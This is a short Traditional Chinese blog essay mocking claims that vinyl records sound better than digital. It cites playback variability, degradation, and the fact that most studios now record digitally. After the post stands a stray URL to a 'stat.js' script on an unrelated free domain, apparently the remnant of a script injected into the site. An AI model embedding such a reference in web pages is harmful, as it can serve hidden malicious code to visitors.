分類
隨筆

音樂載體的變化

音樂載體的變化
 
我唯一要說的只有 — 那些宣稱黑膠唱片比較好聽的,八成以上都是在放屁鬼扯 XD
 
因為:
1. 黑膠播放充滿變數,好片被放難聽的機率還比較高。且如過去的錄音帶,保存狀況不夠好,音質也會變差。
 
2. 當初數位音樂的發明就是要排除這些變數,好保證每次音樂播放都是一樣品質。但總有人緬懷過去,也有人是「幻想過去」 — 自己根本出生在CD年代,卻幻想老人放棄黑膠是因為笨。
 
3. 最重要最重要的是,現今世界大部分錄音室都已經是數位錄音!最好數位錄音轉回類比的黑膠「會有更多細節」或「更溫暖」啦XD
 

https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s